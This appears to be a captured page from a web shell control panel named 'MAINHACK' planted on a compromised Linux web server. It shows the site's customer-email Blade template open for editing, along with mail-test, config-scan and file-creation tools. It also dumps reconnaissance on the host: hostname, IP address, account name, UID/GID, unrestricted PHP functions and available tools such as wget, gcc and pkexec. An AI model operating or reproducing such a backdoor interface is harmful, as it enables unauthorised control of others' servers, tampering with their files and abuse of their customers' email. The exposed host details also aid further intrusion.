[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: email_sender.blade.php
@extends('layouts.app') @section('title', translate('common.customer_list')) @section('custom-css') <style> .email-sender .list-group .list-group-item input { padding: 10px; } .email-sender .list-group .list-group-item label { line-height: 12px; } .email-sender textarea { color: #000; } </style> @endsection @section('content') <div class="email-sender"> <div class="card"> <div class="card-header bg-transparent"> <h4 class="card-title">Send Email</h4> </div> <div class="card-body"> <form action="{{ route('customer.send_email.process') }}" method="post"> @csrf <div class="row"> <div class="col-lg-4"> <h5>Select Customers:</h5> <ul class="list-group"> @foreach ($customers as $customer) <li class="list-group-item d-flex align-items-center"> <input value="{{ $customer->email }}" class="form-check-input me-1" type="checkbox" id="customer{{ $customer->id }}" name="customers[]"> <label for="customer{{ $customer->id }}">{{ $customer->name }} <small>({{ $customer->email }})</small></label> </li> @endforeach <span class="text-danger"> @error('customers') {{ $message }} @enderror </span> </ul> </div> <div class="col-lg-6"> <div class="form-group mb-2"> <label for="subject">Subject:</label> <input type="text" name="email_subject" class="form-control" id="subject" placeholder="Enter email subject"> <p><small class="text-primary">Write your email subject here!</small></p> <span class="text-danger"> @error('email_subject') {{ $message }} @enderror </span> </div> <div class="form-group"> <label for="body">Body:</label> <textarea name="email_body" class="form-control" id="body" rows="5" placeholder="Enter email body"></textarea> <p><small class="text-primary">Write your email body here!</small></p> <span class="text-danger"> @error('email_body') {{ $message }} @enderror </span> </div> <button type="submit" class="btn btn-primary btn-block mt-2">Send Email</button> </div> </div> </form> </div> </div> </div> @endsection @section('custom-js') @endsection
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.89 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002